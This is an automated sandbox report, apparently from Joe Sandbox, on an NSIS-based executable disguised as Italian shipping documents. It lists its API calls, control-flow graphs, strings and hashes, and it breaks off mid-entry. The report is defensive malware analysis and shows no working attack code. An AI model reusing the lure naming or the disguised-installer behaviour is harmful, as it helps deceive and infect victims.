                                          • Part of subcall function 00405B05: CreateDirectoryW.KERNELBASE(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                        • String ID: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\acneform$C:\Users\user\AppData\Local\acneform$C:\Users\user\Desktop$C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                        • API String ID: 1813718867-67052804
                                        • Opcode ID: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                        • Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
                                        • Opcode Fuzzy Hash: 2f58fbcc075b23529aa9588561da4342b8d2734b046618fffc698aa71994b29c
                                        • Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 279 40571b-405736 280 4058c5-4058cc 279->280 281 40573c-405803 GetDlgItem * 3 call 40450b call 404e64 GetClientRect GetSystemMetrics SendMessageW * 2 279->281 282 4058f6-405903 280->282 283 4058ce-4058f0 GetDlgItem CreateThread CloseHandle 280->283 299 405821-405824 281->299 300 405805-40581f SendMessageW * 2 281->300 285 405921-40592b 282->285 286 405905-40590b 282->286 283->282 291 405981-405985 285->291 292 40592d-405933 285->292 289 405946-40594f call 40453d 286->289 290 40590d-40591c ShowWindow * 2 call 40450b 286->290 303 405954-405958 289->303 290->285 291->289 294 405987-40598d 291->294 296 405935-405941 call 4044af 292->296 297 40595b-40596b ShowWindow 292->297 294->289 301 40598f-4059a2 SendMessageW 294->301 296->289 304 40597b-40597c call 4044af 297->304 305 40596d-405976 call 4055dc 297->305 307 405834-40584b call 4044d6 299->307 308 405826-405832 SendMessageW 299->308 300->299 309 405aa4-405aa6 301->309 310 4059a8-4059d3 CreatePopupMenu call 406594 AppendMenuW 301->310 304->291 305->304 318 405881-4058a2 GetDlgItem SendMessageW 307->318 319 40584d-405861 ShowWindow 307->319 308->307 309->303 316 4059d5-4059e5 GetWindowRect 310->316 317 4059e8-4059fd TrackPopupMenu 310->317 316->317 317->309 320 405a03-405a1a 317->320 318->309 323 4058a8-4058c0 SendMessageW * 2 318->323 321 405870 319->321 322 405863-40586e ShowWindow 319->322 324 405a1f-405a3a SendMessageW 320->324 325 405876-40587c call 40450b 321->325 322->325 323->309 324->324 326 405a3c-405a5f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 324->326 325->318 328 405a61-405a88 SendMessageW 326->328 328->328 329 405a8a-405a9e GlobalUnlock SetClipboardData CloseClipboard 328->329 329->309
                                        APIs
                                        • GetDlgItem.USER32(?,00000403), ref: 00405779
                                        • GetDlgItem.USER32(?,000003EE), ref: 00405788
                                        • GetClientRect.USER32(?,?), ref: 004057C5
                                        • GetSystemMetrics.USER32(00000002), ref: 004057CC
                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
                                        • ShowWindow.USER32(?,00000008), ref: 00405868
                                        • GetDlgItem.USER32(?,000003EC), ref: 00405889
                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
                                        • GetDlgItem.USER32(?,000003F8), ref: 00405797
                                          • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                        • GetDlgItem.USER32(?,000003EC), ref: 004058DB
                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
                                        • CloseHandle.KERNELBASE(00000000), ref: 004058F0
                                        • ShowWindow.USER32(00000000), ref: 00405914
                                        • ShowWindow.USER32(?,00000008), ref: 00405919
                                        • ShowWindow.USER32(00000008), ref: 00405963
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
                                        • CreatePopupMenu.USER32 ref: 004059A8
                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
                                        • GetWindowRect.USER32(?,?), ref: 004059DC
                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
                                        • OpenClipboard.USER32(00000000), ref: 00405A3D
                                        • EmptyClipboard.USER32 ref: 00405A43
                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
                                        • GlobalLock.KERNEL32(00000000), ref: 00405A59
                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
                                        • CloseClipboard.USER32 ref: 00405A9E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                        • String ID: {
                                        • API String ID: 590372296-366298937
                                        • Opcode ID: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
                                        • Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
                                        • Opcode Fuzzy Hash: 6ac74cf2b0cd8326ebbb69d62323ae371d5bd3f712404c75dedbcee8fb33a3cc
                                        • Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 578 405c63-405c89 call 405f2e 581 405ca2-405ca9 578->581 582 405c8b-405c9d DeleteFileW 578->582 584 405cab-405cad 581->584 585 405cbc-405ccc call 406557 581->585 583 405e1f-405e23 582->583 586 405cb3-405cb6 584->586 587 405dcd-405dd2 584->587 593 405cdb-405cdc call 405e72 585->593 594 405cce-405cd9 lstrcatW 585->594 586->585 586->587 587->583 590 405dd4-405dd7 587->590 591 405de1-405de9 call 4068b4 590->591 592 405dd9-405ddf 590->592 591->583 602 405deb-405dff call 405e26 call 405c1b 591->602 592->583 596 405ce1-405ce5 593->596 594->596 598 405cf1-405cf7 lstrcatW 596->598 599 405ce7-405cef 596->599 601 405cfc-405d18 lstrlenW FindFirstFileW 598->601 599->598 599->601 603 405dc2-405dc6 601->603 604 405d1e-405d26 601->604 618 405e01-405e04 602->618 619 405e17-405e1a call 4055dc 602->619 603->587 609 405dc8 603->609 606 405d46-405d5a call 406557 604->606 607 405d28-405d30 604->607 620 405d71-405d7c call 405c1b 606->620 621 405d5c-405d64 606->621 610 405d32-405d3a 607->610 611 405da5-405db5 FindNextFileW 607->611 609->587 610->606 614 405d3c-405d44 610->614 611->604 617 405dbb-405dbc FindClose 611->617 614->606 614->611 617->603 618->592 623 405e06-405e15 call 4055dc call 406317 618->623 619->583 629 405d9d-405da0 call 4055dc 620->629 630 405d7e-405d81 620->630 621->611 624 405d66-405d6f call 405c63 621->624 623->583 624->611 629->611 633 405d83-405d93 call 4055dc call 406317 630->633 634 405d95-405d9b 630->634 633->611 634->611
                                        APIs
                                        • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405C8C
                                        • lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405CD4
                                        • lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405CF7
                                        • lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405CFD
                                        • FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"), ref: 00405D0D
                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
                                        • FindClose.KERNEL32(00000000), ref: 00405DBC
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70
                                        • "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe", xrefs: 00405C6C
                                        • pB, xrefs: 00405CBC
                                        • \*.*, xrefs: 00405CCE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$pB
                                        • API String ID: 2035342205-473530011
                                        • Opcode ID: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                        • Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
                                        • Opcode Fuzzy Hash: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                        • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
                                        APIs
                                        • FindFirstFileW.KERNELBASE(74DF3420,0042FAB8,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                        • FindClose.KERNEL32(00000000), ref: 004068CB
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp, xrefs: 004068B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsaE9D3.tmp
                                        • API String ID: 2295610775-1031832637
                                        • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                        • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                        • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                        • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
                                        APIs
                                        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
                                        • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                        • Opcode Fuzzy Hash: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
                                        • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 330 403fd7-403fe9 331 404150-40415f 330->331 332 403fef-403ff5 330->332 334 404161-4041a9 GetDlgItem * 2 call 4044d6 SetClassLongW call 40140b 331->334 335 4041ae-4041c3 331->335 332->331 333 403ffb-404004 332->333 336 404006-404013 SetWindowPos 333->336 337 404019-404020 333->337 334->335 339 404203-404208 call 404522 335->339 340 4041c5-4041c8 335->340 336->337 342 404022-40403c ShowWindow 337->342 343 404064-40406a 337->343 348 40420d-404228 339->348 345 4041ca-4041d5 call 401389 340->345 346 4041fb-4041fd 340->346 349 404042-404055 GetWindowLongW 342->349 350 40413d-40414b call 40453d 342->350 351 404083-404086 343->351 352 40406c-40407e DestroyWindow 343->352 345->346 371 4041d7-4041f6 SendMessageW 345->371 346->339 347 4044a3 346->347 359 4044a5-4044ac 347->359 356 404231-404237 348->356 357 40422a-40422c call 40140b 348->357 349->350 358 40405b-40405e ShowWindow 349->358 350->359 362 404088-404094 SetWindowLongW 351->362 363 404099-40409f 351->363 360 404480-404486 352->360 368 404461-40447a DestroyWindow EndDialog 356->368 369 40423d-404248 356->369 357->356 358->343 360->347 367 404488-40448e 360->367 362->359 363->350 370 4040a5-4040b4 GetDlgItem 363->370 367->347 372 404490-404499 ShowWindow 367->372 368->360 369->368 373 40424e-40429b call 406594 call 4044d6 * 3 GetDlgItem 369->373 374 4040d3-4040d6 370->374 375 4040b6-4040cd SendMessageW IsWindowEnabled 370->375 371->359 372->347 402 4042a5-4042e1 ShowWindow KiUserCallbackDispatcher call 4044f8 EnableWindow 373->402 403 40429d-4042a2 373->403 377 4040d8-4040d9 374->377 378 4040db-4040de 374->378 375->347 375->374 379 404109-40410e call 4044af 377->379 380 4040e0-4040e6 378->380 381 4040ec-4040f1 378->381 379->350 383 404127-404137 SendMessageW 380->383 384 4040e8-4040ea 380->384 381->383 385 4040f3-4040f9 381->385 383->350 384->379 388 404110-404119 call 40140b 385->388 389 4040fb-404101 call 40140b 385->389 388->350 399 40411b-404125 388->399 398 404107 389->398 398->379 399->398 406 4042e3-4042e4 402->406 407 4042e6 402->407 403->402 408 4042e8-404316 GetSystemMenu EnableMenuItem SendMessageW 406->408 407->408 409 404318-404329 SendMessageW 408->409 410 40432b 408->410 411 404331-404370 call 40450b call 403fb8 call 406557 lstrlenW call 406594 SetWindowTextW call 401389 409->411 410->411 411->348 422 404376-404378 411->422 422->348 423 40437e-404382 422->423 424 4043a1-4043b5 DestroyWindow 423->424 425 404384-40438a 423->425 424->360 427 4043bb-4043e8 CreateDialogParamW 424->427 425->347 426 404390-404396 425->426 426->348 428 40439c 426->428 427->360 429 4043ee-404445 call 4044d6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 427->429 428->347 429->347 434 404447-40445a ShowWindow call 404522 429->434 436 40445f 434->436 436->360
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                        • ShowWindow.USER32(?), ref: 00404033
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                        • ShowWindow.USER32(?,00000004), ref: 0040405E
                                        • DestroyWindow.USER32 ref: 00404072
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                        • GetDlgItem.USER32(?,?), ref: 004040AA
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                        • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                        • GetDlgItem.USER32(?,00000001), ref: 00404170
                                        • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                        • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                        • ShowWindow.USER32(00000000,?), ref: 004042AC
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
                                        • EnableWindow.USER32(?,?), ref: 004042D9
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                        • EnableMenuItem.USER32(00000000), ref: 004042F6
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                        • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                        • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                        • ShowWindow.USER32(?,0000000A), ref: 00404493
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1699822956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1699808206.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699836984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1699850995.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1700002077.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione 0009333000459595995.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 121052019-0
                                        • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                        • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                        • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                        • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 437 403c29-403c41 call 40694b 440 403c43-403c53 call 40649e 437->440 441 403c55-403c8c call 406425 437->441 450 403caf-403cd8 call 403eff call 405f2e 440->450 446 403ca4-403caa lstrcatW 441->446 447 403c8e-403c9f call 406425 441->447 446->450 447->446 455 403d6a-403d72 call 405f2e 450->455 456 403cde-403ce3 450->456 462 403d80-403da5 LoadImageW 455->462 463 403d74-403d7b call 406594 455->463 456->455 457 403ce9-403d11 call 406425 456->457 457->455 464 403d13-403d17 457->464 466 403e26-403e2e call 40140b 462->466 467 403da7-403dd7 RegisterClassW 462->467 463->462 468 403d29-403d35 lstrlenW 464->468 469 403d19-403d26 call 405e53 464->469 481 403e30-403e33 466->481 482 403e38-403e43 call 403eff 466->482 470 403ef5 467->470 471 403ddd-403e21 SystemParametersInfoW CreateWindowExW 467->471 475 403d37-403d45 lstrcmpiW 468->475 476 403d5d-403d65 call 405e26 call 406557 468->476 469->468 474 403ef7-403efe 470->474 471->466 475->476 480 403d47-403d51 GetFileAttributesW 475->480 476->455 485 403d53-403d55 480->485 486 403d57-403d58 call 405e72 480->486 481->474 490 403e49-403e63 ShowWindow call 4068db 482->490 491 403ecc-403ecd call 4056af 482->491 485->476 485->486 486->476 498 403e65-403e6a call 4068db 490->498 499 403e6f-403e81 GetClassInfoW 490->499 494 403ed2-403ed4 491->494 496 403ed6-403edc 494->496 497 403eee-403ef0 call 40140b 494->497 496->481 500 403ee2-403ee9 call 40140b 496->500 497->470 498->499 503 403e83-403e93 GetClassInfoW RegisterClassW 499->503 504 403e99-403ebc DialogBoxParamW call 40140b 499->504 500->481 503->504 508 403ec1-403eca call 403b79 504->508 508->474
                                        APIs
                                          • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                          • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                        • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe",00008001), ref: 00403CAA
                                        • lstrlenW.KERNEL32(Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Local\acneform,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
                                        • lstrcmpiW.KERNEL32(?,.exe,Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Local\acneform,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                        • GetFileAttributesW.KERNEL32(Exec), ref: 00403D48
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\acneform), ref: 00403D91
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                        • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                        • RegisterClassW.USER32(004336A0), ref: 00403E93
                                        • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                        Strings
                                        Memory Dump Source
